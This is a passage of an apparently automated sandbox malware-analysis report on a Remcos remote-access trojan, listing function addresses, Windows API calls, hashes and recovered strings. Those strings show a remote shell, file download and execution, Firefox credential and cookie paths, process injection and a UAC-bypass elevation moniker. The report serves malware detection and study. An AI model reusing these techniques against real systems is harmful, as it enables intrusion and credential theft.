                                    • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                    • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                    Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                    • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                    • ExitProcess.KERNEL32 ref: 004432EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                    • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                    • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                    Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • CloseHandle.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                    • String ID: PkGNG
                                    • API String ID: 3658366068-263838557
                                    • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                    • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                    Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 30 448566-44857a 31 448587-4485a2 LoadLibraryExW 30->31 32 44857c-448585 30->32 34 4485a4-4485ad GetLastError 31->34 35 4485cb-4485d1 31->35 33 4485de-4485e0 32->33 36 4485bc 34->36 37 4485af-4485ba LoadLibraryExW 34->37 38 4485d3-4485d4 FreeLibrary 35->38 39 4485da 35->39 40 4485be-4485c0 36->40 37->40 38->39 41 4485dc-4485dd 39->41 40->35 42 4485c2-4485c9 40->42 41->33 42->41
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                    Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 43 40d069-40d095 call 401fab CreateMutexA GetLastError
                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                    Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 46 4484ca-4484f4 47 4484f6-4484f8 46->47 48 44855f 46->48 49 4484fe-448504 47->49 50 4484fa-4484fc 47->50 51 448561-448565 48->51 52 448506-448508 call 448566 49->52 53 448520 49->53 50->51 56 44850d-448510 52->56 55 448522-448524 53->55 57 448526-448534 GetProcAddress 55->57 58 44854f-44855d 55->58 59 448541-448547 56->59 60 448512-448518 56->60 61 448536-44853f call 43436e 57->61 62 448549 57->62 58->48 59->55 60->52 63 44851a 60->63 61->50 62->58 63->53
                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                    Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 80 446137-446143 81 446175-446180 call 4405dd 80->81 82 446145-446147 80->82 89 446182-446184 81->89 83 446160-446171 RtlAllocateHeap 82->83 84 446149-44614a 82->84 87 446173 83->87 88 44614c-446153 call 445545 83->88 84->83 87->89 88->81 92 446155-44615e call 442f80 88->92 92->81 92->83
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

                                    Non-executed Functions

                                    Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 3550356753090ff8d2e7e1df532b22bc2240acea58abd593ad1f807a75680658
                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                    • Opcode Fuzzy Hash: 3550356753090ff8d2e7e1df532b22bc2240acea58abd593ad1f807a75680658
                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                    Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: da1bdc8411f8e038db4cd2d7e88b66755248fa7fef226cae948f8866e4122cee
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: da1bdc8411f8e038db4cd2d7e88b66755248fa7fef226cae948f8866e4122cee
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                    • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                    Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$File$FirstNext
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 3527384056-432212279
                                    • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                    • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                    Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4B9
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                    • API String ID: 3756808967-1743721670
                                    • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                    • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                    Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                    • API String ID: 0-1861860590
                                    • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                    • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                    Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                    • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                    Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: ed14f39142b7dc807e6e03d385886ca39e93324b35c447149c6a94c081aeaa6a
                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                    • Opcode Fuzzy Hash: ed14f39142b7dc807e6e03d385886ca39e93324b35c447149c6a94c081aeaa6a
                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                    Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Strings
                                    Memory Dump Source
